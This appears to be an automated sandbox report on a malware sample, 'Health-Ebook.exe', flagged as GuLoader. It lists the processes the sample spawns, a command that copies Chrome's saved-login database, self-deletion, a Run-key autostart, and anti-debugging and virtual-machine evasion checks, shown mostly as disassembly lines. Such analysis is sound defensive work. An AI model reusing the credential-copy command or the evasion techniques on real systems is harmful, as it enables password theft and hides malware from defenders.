Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: Health-Ebook.exeVirustotal: Detection: 63%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\Health-Ebook.exe 'C:\Users\user\Desktop\Health-Ebook.exe'
Source: unknownProcess created: C:\Users\user\Desktop\Health-Ebook.exe 'C:\Users\user\Desktop\Health-Ebook.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Health-Ebook.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Bjrnh\h8tczuli.exe C:\Program Files (x86)\Bjrnh\h8tczuli.exe
Source: unknownProcess created: C:\Program Files (x86)\Bjrnh\h8tczuli.exe C:\Program Files (x86)\Bjrnh\h8tczuli.exe
Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Users\user\Desktop\Health-Ebook.exeProcess created: C:\Users\user\Desktop\Health-Ebook.exe 'C:\Users\user\Desktop\Health-Ebook.exe' Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Bjrnh\h8tczuli.exe C:\Program Files (x86)\Bjrnh\h8tczuli.exeJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Health-Ebook.exe'Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeProcess created: C:\Program Files (x86)\Bjrnh\h8tczuli.exe C:\Program Files (x86)\Bjrnh\h8tczuli.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\SysWOW64\netsh.exeFile written: C:\Users\user\AppData\Roaming\O2116906\O21logri.iniJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: chkdsk.pdbGCTL source: h8tczuli.exe, 0000000F.00000002.1088912721.0000000000090000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.793470869.0000000007010000.00000002.00000001.sdmp
Source: Binary string: netsh.pdb source: Health-Ebook.exe, 00000002.00000002.820558651.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: chkdsk.pdb source: h8tczuli.exe, 0000000F.00000002.1088912721.0000000000090000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Health-Ebook.exe, 00000002.00000002.825390421.000000001F5FF000.00000040.00000001.sdmp, h8tczuli.exe, 0000000F.00000002.1093741018.000000001F4BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000003.1091567984.0000000000AF0000.00000004.00000001.sdmp
Source: Binary string: netsh.pdbGCTL source: Health-Ebook.exe, 00000002.00000002.820558651.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Health-Ebook.exe, h8tczuli.exe, chkdsk.exe, 00000010.00000003.1091567984.0000000000AF0000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.793470869.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Yara detected GuLoaderShow sources
Source: Yara matchFile source: Process Memory Space: Health-Ebook.exe PID: 1616, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Health-Ebook.exe PID: 3764, type: MEMORY
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_00409018 push esi; iretd 0_2_00409019
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_004068B4 push ecx; retf 0_2_004068B5
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_004086EC push ecx; ret 0_2_004086ED
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_00408748 push ebp; ret 0_2_00408749
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_00408F30 push esi; iretd 0_2_00408F31
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_0204567D push ss; iretd 0_2_0204574A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_020456FE push ss; iretd 0_2_0204574A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_02043409 push esi; retf 0_2_0204340F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_02043509 push esi; retf 0_2_0204350F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_020455A6 push ss; iretd 0_2_020455CA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F55DE2D push ecx; ret 2_2_1F55DE40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000A0000 push cs; ret 2_2_000A002C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000B9A35 push eax; ret 2_2_000B9A88
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000B9A8B push eax; ret 2_2_000B9AF2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000B9A82 push eax; ret 2_2_000B9A88
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000B9AEC push eax; ret 2_2_000B9AF2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_000B46E2 push es; ret 2_2_000B46EC
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F3409 push esi; retf 2_2_004F340F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F3509 push esi; retf 2_2_004F350F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F55A6 push ss; iretd 2_2_004F55CA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F567D push ss; iretd 2_2_004F574A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F56FE push ss; iretd 2_2_004F574A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 14_2_006F3409 push esi; retf 14_2_006F340F
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 14_2_006F3509 push esi; retf 14_2_006F350F
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 14_2_006F55A6 push ss; iretd 14_2_006F55CA
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 14_2_006F567D push ss; iretd 14_2_006F574A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 14_2_006F56FE push ss; iretd 14_2_006F574A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_1F41DE2D push ecx; ret 15_2_1F41DE40
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_00079A35 push eax; ret 15_2_00079A88
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_00079A82 push eax; ret 15_2_00079A88
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 15_2_00079A8B push eax; ret 15_2_00079AF2

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Windows\SysWOW64\netsh.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JLUXIVHPJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JLUXIVHPJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\Health-Ebook.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Health-Ebook.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Health-Ebook.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000003007244 second address: 000000000300724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 00000000030074AE second address: 00000000030074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D5595 rdtsc 2_2_1F5D5595
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeAPI coverage: 4.2 %
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeAPI coverage: 4.2 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exe TID: 2412Thread sleep count: 180 > 30Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 4460Thread sleep time: -65000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe TID: 1416Thread sleep count: 134 > 30Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: explorer.exe, 00000003.00000000.794031278.0000000007340000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.794031278.0000000007340000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.794031278.0000000007340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.794031278.0000000007340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to hide a thread from the debuggerShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_0204008A NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,000000000_2_0204008A
Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\Health-Ebook.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\Health-Ebook.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeThread information set: HideFromDebuggerJump to behavior
Checks if the current process is being debuggedShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeProcess queried: DebugPortJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D5595 rdtsc 2_2_1F5D5595
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_0204251B LdrInitializeThunk,0_2_0204251B
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_02040E18 mov eax, dword ptr fs:[00000030h]0_2_02040E18
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_02041F5F mov eax, dword ptr fs:[00000030h]0_2_02041F5F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_02043F7D mov eax, dword ptr fs:[00000030h]0_2_02043F7D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_02043FBB mov eax, dword ptr fs:[00000030h]0_2_02043FBB
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_02044502 mov eax, dword ptr fs:[00000030h]0_2_02044502
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_0204159F mov eax, dword ptr fs:[00000030h]0_2_0204159F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51DF40 mov eax, dword ptr fs:[00000030h]2_2_1F51DF40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F535744 mov eax, dword ptr fs:[00000030h]2_2_1F535744
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F535744 mov eax, dword ptr fs:[00000030h]2_2_1F535744
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52C74A mov eax, dword ptr fs:[00000030h]2_2_1F52C74A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52C74A mov eax, dword ptr fs:[00000030h]2_2_1F52C74A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F582F40 mov eax, dword ptr fs:[00000030h]2_2_1F582F40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5B3740 mov eax, dword ptr fs:[00000030h]2_2_1F5B3740
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5B8747 mov eax, dword ptr fs:[00000030h]2_2_1F5B8747
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F549F7A mov eax, dword ptr fs:[00000030h]2_2_1F549F7A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EF60 mov eax, dword ptr fs:[00000030h]2_2_1F51EF60
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F540761 mov eax, dword ptr fs:[00000030h]2_2_1F540761
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531F10 mov eax, dword ptr fs:[00000030h]2_2_1F531F10
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F531F10 mov eax, dword ptr fs:[00000030h]2_2_1F531F10
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C2F18 mov eax, dword ptr fs:[00000030h]2_2_1F5C2F18
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C2F18 mov eax, dword ptr fs:[00000030h]2_2_1F5C2F18
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C2F18 mov eax, dword ptr fs:[00000030h]2_2_1F5C2F18
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F506700 mov eax, dword ptr fs:[00000030h]2_2_1F506700
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F506700 mov eax, dword ptr fs:[00000030h]2_2_1F506700
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F506700 mov eax, dword ptr fs:[00000030h]2_2_1F506700
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F532700 mov edi, dword ptr fs:[00000030h]2_2_1F532700
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516F05 mov eax, dword ptr fs:[00000030h]2_2_1F516F05
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516F05 mov eax, dword ptr fs:[00000030h]2_2_1F516F05
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516F05 mov eax, dword ptr fs:[00000030h]2_2_1F516F05
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516F05 mov eax, dword ptr fs:[00000030h]2_2_1F516F05
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516F05 mov eax, dword ptr fs:[00000030h]2_2_1F516F05
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D870A mov eax, dword ptr fs:[00000030h]2_2_1F5D870A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F506F30 mov eax, dword ptr fs:[00000030h]2_2_1F506F30
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F506F30 mov eax, dword ptr fs:[00000030h]2_2_1F506F30
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CDF39 mov eax, dword ptr fs:[00000030h]2_2_1F5CDF39
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]2_2_1F502FD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]2_2_1F502FD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]2_2_1F502FD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502FD0 mov ecx, dword ptr fs:[00000030h]2_2_1F502FD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]2_2_1F502FD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]2_2_1F502FD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]2_2_1F502FD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]2_2_1F502FD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]2_2_1F502FD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]2_2_1F502FD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]2_2_1F502FD0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5067D0 mov eax, dword ptr fs:[00000030h]2_2_1F5067D0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5067D0 mov eax, dword ptr fs:[00000030h]2_2_1F5067D0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5067D0 mov eax, dword ptr fs:[00000030h]2_2_1F5067D0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5BF7D3 mov eax, dword ptr fs:[00000030h]2_2_1F5BF7D3
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5867C9 mov eax, dword ptr fs:[00000030h]2_2_1F5867C9
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5867C9 mov eax, dword ptr fs:[00000030h]2_2_1F5867C9
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5867C9 mov eax, dword ptr fs:[00000030h]2_2_1F5867C9
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5867C9 mov ecx, dword ptr fs:[00000030h]2_2_1F5867C9
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5867C9 mov eax, dword ptr fs:[00000030h]2_2_1F5867C9
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5867C9 mov eax, dword ptr fs:[00000030h]2_2_1F5867C9
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50E7F3 mov eax, dword ptr fs:[00000030h]2_2_1F50E7F3
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5B87F1 mov eax, dword ptr fs:[00000030h]2_2_1F5B87F1
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5347FD mov esi, dword ptr fs:[00000030h]2_2_1F5347FD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5347FD mov eax, dword ptr fs:[00000030h]2_2_1F5347FD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5347FD mov eax, dword ptr fs:[00000030h]2_2_1F5347FD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F503FE5 mov eax, dword ptr fs:[00000030h]2_2_1F503FE5
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F503FE5 mov eax, dword ptr fs:[00000030h]2_2_1F503FE5
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F503FE5 mov eax, dword ptr fs:[00000030h]2_2_1F503FE5
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5177ED mov eax, dword ptr fs:[00000030h]2_2_1F5177ED
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CF7E2 mov eax, dword ptr fs:[00000030h]2_2_1F5CF7E2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CF7E2 mov eax, dword ptr fs:[00000030h]2_2_1F5CF7E2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CF7E2 mov eax, dword ptr fs:[00000030h]2_2_1F5CF7E2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CF7E2 mov eax, dword ptr fs:[00000030h]2_2_1F5CF7E2
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov ecx, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov ecx, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov ecx, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov ecx, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]2_2_1F525790
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52E79A mov eax, dword ptr fs:[00000030h]2_2_1F52E79A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CAF81 mov eax, dword ptr fs:[00000030h]2_2_1F5CAF81
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CAF81 mov eax, dword ptr fs:[00000030h]2_2_1F5CAF81
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CAF81 mov eax, dword ptr fs:[00000030h]2_2_1F5CAF81
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CAF81 mov eax, dword ptr fs:[00000030h]2_2_1F5CAF81
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]2_2_1F5C2782
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]2_2_1F5C2782
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]2_2_1F5C2782
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]2_2_1F5C2782
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]2_2_1F5C2782
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]2_2_1F5C2782
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]2_2_1F5C2782
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52A7B6 mov eax, dword ptr fs:[00000030h]2_2_1F52A7B6
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CFFAC mov eax, dword ptr fs:[00000030h]2_2_1F5CFFAC
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CFFAC mov eax, dword ptr fs:[00000030h]2_2_1F5CFFAC
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50CE50 mov eax, dword ptr fs:[00000030h]2_2_1F50CE50
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50E650 mov eax, dword ptr fs:[00000030h]2_2_1F50E650
